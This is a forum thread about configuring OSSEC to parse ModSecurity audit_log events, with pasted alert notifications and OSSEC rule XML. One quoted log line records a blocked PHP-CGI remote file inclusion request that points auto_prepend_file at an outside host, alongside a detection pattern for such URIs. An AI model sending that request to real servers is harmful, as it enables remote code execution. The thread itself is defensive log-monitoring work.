Atomicorp

I've searched and searched but can't seem to find the correct log format to use for monitoring audit_log with Ossec.

<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>

I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?

Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.

scott wrote:Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.

Thanks, I am.

Is "apache" the correct log format?

This is what I get reported in Ossec notifications:

OSSEC HIDS Notification.
2013 Sep 19 09:07:53

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.



--END OF NOTIFICATION



OSSEC HIDS Notification.
2013 Sep 19 09:08:01

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.



--END OF NOTIFICATION

Yes, "apache" is correct. This error:

Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."

Means your ossec rules dont have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).

Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.

Here are the mod_security rules included in my apache_rules.xml:

<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>

<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>

<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>

<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

After reviewing the rules I just posted, the match phrases seem to be incorrect for the way audit_log has things worded.

Do I have the wrong Ossec rules or the wrong audit_log format?

Wrong or old ossec rules.

I have the latest Ossec 2.7 with rules installed from ossec.net. They do list getting it directly from the AtomiCorp repository, however my monitoring server is an AWS and not compatible with "RPMs for RHEL, CentOS, Fedora and others". I used Server 2.7 – Linux/BSD download instead.

http://www.ossec.net/?page_id=19

Would that make a difference?

It certainly could. The other problem you're going to have with the ossec rules you posted is that they dont recognized modsecurity levels, and will treat all modsecurity events the same. Which means you'll also end up blocking lower level rules (suspicious or just informational rules, as opposed to actual attacks).